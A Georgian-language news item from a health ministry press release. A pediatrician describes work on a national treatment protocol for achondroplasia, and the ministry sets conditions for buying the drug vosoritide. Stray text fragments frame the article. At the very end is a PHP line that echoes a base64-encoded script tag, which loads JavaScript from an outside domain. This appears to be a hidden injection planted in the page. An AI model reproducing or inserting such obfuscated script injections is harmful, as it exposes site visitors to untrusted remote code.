celsiusi
ავერსი შნაიდერი

თუ ჯანდაცვის მსოფლიო ორგანიზაცია ამ პრეპარატს აღიარებს, ქვეყანა უნდა იყოს მზად მისი დანერგვისათვის. ბავშვი უნდა იყოს გარკვეული მეთვალყურეობის ქვეშ, ამიტომ, მის დანერგვას სჭირდება უზრუნველყოფა, რომლის უკანაც დგას ეროვნული პროტოკოლი, – ამბობს პედიატრი, პროფესორი ივანე ჩხაიძე.

მისივე განცხადებით, სახელმწიფო აქონდროპლაზიის სამკურნალო ეროვნულ პროტოკოლზე მუშაობს, რომელიც ამ დრომდე არ არსებობდა. როგორც ივანე ჩხაიძემ აღნიშნა, ამ მიზნით, ჯანდაცვის სამინისტროს ინიციატივით შექმნილი მულტიდისციპლინური ჯგუფი ინტენსიურად მუშაობს და პროცესი სრულად გამჭვირვალეა.

„ამ პროტოკოლზე მუშაობს ყველა ის გამოჩენილი და ცნობილი ექიმი, ვისაც შეუძლია მულტიფაქტორული დაავადების მართვა. ესენი არიან: პედიატრი, გენეტიკური დაავადებების სპეციალისტი, ენდოკრინოლოგი, ტრავმატოლოგი და ა.შ. ამ სამუშაო ჯგუფში შედის პაციენტთა მშობლების წარმომადგენელი. ჩვენ გვექნება ეროვნული პროტოკოლი, რომელიც აუცილებელი იქნება მაშინ, თუ ამ პრეპარატის შეძენაზე დადებითი გადაწყვეტილება იქნება მიღებული“, – განაცხადა ივანე ჩხაიძემ.

როგორც ჯანდაცვის სამინისტროს ინფორმაციაშია აღნიშნული, რაც შეეხება „ვოსორიტიდის“ შეძენის საკითხს, ჯანდაცვის სამინისტროს გადაწყვეტილებით, თუ მიმდინარე წლის სექტემბრისთვის, ევროკავშირის წევრი რამდენიმე ქვეყანა მაინც, აიღებს პასუხისმგებლობას და სახელმწიფო ბიუჯეტიდან დააფინანსებს აქონდროპლაზიის ახალშექმნილ სამკურნალო მედიკამენტ „ვოსორიტიდს“, საქართველო იქნება მსოფლიოში ერთ-ერთი მოწინავე, რომელიც ამ პასუხისმგებლობას გაიზიარებს და წამლის შესყიდვისთვის საჭირო პროცედურებს დაიწყებს.

ინფორმაციას ჯანდაცვის სამინისტროს პრესსამსახური ავრცელებს. 

310
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");